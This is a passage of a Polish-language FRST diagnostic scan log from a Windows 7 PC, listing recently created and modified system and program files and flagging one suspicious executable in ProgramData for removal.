2016-04-19 03:40 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00071680 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx 2016-04-19 03:40 - 2016-04-19 03:40 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2016-04-19 03:39 - 2016-04-19 03:39 - 03969472 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe 2016-04-19 03:39 - 2016-04-19 03:39 - 03914176 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-04-19 03:39 - 2016-04-19 03:39 - 01294272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys 2016-04-19 03:39 - 2016-04-19 03:39 - 01289096 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2016-04-19 03:39 - 2016-04-19 03:39 - 00640512 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-04-19 03:39 - 2016-04-19 03:39 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll 2016-04-19 03:39 - 2016-04-19 03:39 - 00338944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys 2016-04-19 03:39 - 2016-04-19 03:39 - 00240496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys 2016-04-19 03:39 - 2016-04-19 03:39 - 00231424 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll 2016-04-19 03:39 - 2016-04-19 03:39 - 00187752 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS 2016-04-19 03:39 - 2016-04-19 03:39 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe 2016-04-19 03:39 - 2016-04-19 03:39 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\taskhost.exe 2016-04-19 03:39 - 2016-04-19 03:39 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00868352 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00271360 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe 2016-04-19 03:38 - 2016-04-19 03:38 - 00169984 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2016-04-19 03:38 - 2016-04-19 03:38 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 03419136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 02284544 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 01988096 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 01247744 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 01230336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 01158144 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 01080832 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00906240 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00604160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00364544 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00249856 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00220160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00010752 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll 2016-04-19 03:37 - 2016-04-19 03:37 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll 2016-04-19 03:36 - 2016-04-19 03:36 - 01505280 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll 2016-04-19 03:34 - 2016-04-19 03:34 - 02077392 _____ (Microsoft Corporation) C:\Users\Dominik\Desktop\IE11-Windows6.1.exe 2016-04-17 02:04 - 2016-04-17 02:05 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\U3 ==================== Jeden miesiąc - zmodyfikowane pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2016-04-30 12:42 - 2009-07-14 06:34 - 00023872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-04-30 12:42 - 2009-07-14 06:34 - 00023872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2016-04-30 12:39 - 2011-04-12 07:08 - 00887196 _____ C:\Windows\system32\perfh015.dat 2016-04-30 12:39 - 2011-04-12 07:08 - 00201204 _____ C:\Windows\system32\perfc015.dat 2016-04-30 12:39 - 2010-11-20 23:01 - 01863312 _____ C:\Windows\system32\PerfStringBackup.INI 2016-04-30 12:39 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\inf 2016-04-30 12:35 - 2016-01-17 10:58 - 00001032 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2016-04-30 12:34 - 2009-07-14 06:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-04-30 00:09 - 2016-01-17 10:58 - 00001036 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2016-04-28 21:39 - 2016-01-30 06:39 - 00000000 ____D C:\ProgramData\BlueStacksSetup 2016-04-28 21:39 - 2016-01-18 05:20 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\MPC-HC 2016-04-28 21:38 - 2016-02-01 01:05 - 00000000 ____D C:\Windows\Minidump 2016-04-28 21:38 - 2016-01-17 07:25 - 00000000 ____D C:\Windows\Panther 2016-04-28 21:38 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\ModemLogs 2016-04-28 21:33 - 2016-02-27 16:52 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\PriceFountainUpdateVer 2016-04-28 21:11 - 2016-01-17 10:59 - 00002107 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-04-28 21:11 - 2016-01-17 10:59 - 00002095 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2016-04-28 20:45 - 2009-07-14 04:04 - 00000215 _____ C:\Windows\system.ini 2016-04-28 20:19 - 2016-02-28 16:40 - 00000266 __RSH C:\ProgramData\ntuser.pol 2016-04-28 20:18 - 2009-07-14 04:03 - 36962304 _____ C:\Windows\system32\config\SOFTWARE.bak 2016-04-28 20:18 - 2009-07-14 04:03 - 19660800 _____ C:\Windows\system32\config\SYSTEM.bak 2016-04-28 20:18 - 2009-07-14 04:03 - 00262144 _____ C:\Windows\system32\config\SECURITY.bak 2016-04-28 20:18 - 2009-07-14 04:03 - 00262144 _____ C:\Windows\system32\config\SAM.bak 2016-04-28 20:18 - 2009-07-14 04:03 - 00262144 _____ C:\Windows\system32\config\DEFAULT.bak 2016-04-28 20:17 - 2011-04-12 07:17 - 00000000 ____D C:\Windows\ShellNew 2016-04-28 20:15 - 2016-01-17 12:50 - 00000000 ____D C:\ProgramData\TEMP 2016-04-28 20:06 - 2016-01-17 15:20 - 00000434 _____ C:\Windows\system32\Drivers\etc\hosts.ics 2016-04-28 19:39 - 2016-01-17 20:17 - 00000000 ___HD C:\Program Files\InstallShield Installation Information 2016-04-28 12:20 - 2016-02-20 19:13 - 00000000 ____D C:\Users\Dominik\Desktop\PSX 2016-04-24 00:55 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\system32\NDF 2016-04-22 02:24 - 2016-01-21 15:48 - 00001890 _____ C:\Windows\diagwrn.xml 2016-04-22 02:24 - 2016-01-21 15:48 - 00001890 _____ C:\Windows\diagerr.xml 2016-04-22 01:52 - 2016-01-17 13:54 - 00000000 ____D C:\Users\Dominik\Documents\Instalki i Programy testowe 2016-04-21 17:29 - 2016-03-30 17:00 - 00000000 ____D C:\Program Files\PLAY ONLINE 2016-04-19 20:56 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\rescache 2016-04-19 04:14 - 2009-07-14 06:33 - 00265896 _____ C:\Windows\system32\FNTCACHE.DAT 2016-04-19 04:11 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\PolicyDefinitions 2016-04-19 02:30 - 2009-07-14 06:53 - 00032522 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2016-04-17 02:08 - 2016-01-18 13:33 - 00000000 ____D C:\Program Files\Opera 2016-04-17 02:01 - 2016-02-17 08:45 - 00000000 ____D C:\ProgramData\ProductData ==================== Pliki w katalogu głównym wybranych folderów ======= 2016-01-23 03:54 - 2016-01-28 16:55 - 0000005 _____ () C:\Program Files\is.dat 2016-01-23 03:58 - 2016-01-23 03:58 - 0016384 _____ () C:\Program Files\uik.dat 2016-01-29 22:55 - 2016-01-29 22:55 - 26320776 _____ () C:\Users\Dominik\AppData\Roaming\gameboxsetup.exe 2016-01-18 15:10 - 2016-02-24 12:51 - 0000063 _____ () C:\Users\Dominik\AppData\Roaming\WB.CFG 2016-03-05 14:36 - 2016-03-05 14:36 - 0000017 _____ () C:\Users\Dominik\AppData\Local\resmon.resmoncfg 2010-11-20 23:29 - 2010-11-20 23:29 - 84704256 ___SH () C:\ProgramData\msvei.exe Pliki do przeniesienia lub usunięcia: ==================== C:\ProgramData\msvei.exe ==================== Bamital & volsnap ================= (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) C:\Windows\explorer.exe => Plik podpisany cyfrowo C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo C:\Windows\system32\services.exe => Plik podpisany cyfrowo C:\Windows\system32\User32.dll => Plik podpisany cyfrowo C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo LastRegBack: 2016-04-28 04:06 ==================== Koniec FRST.txt ============================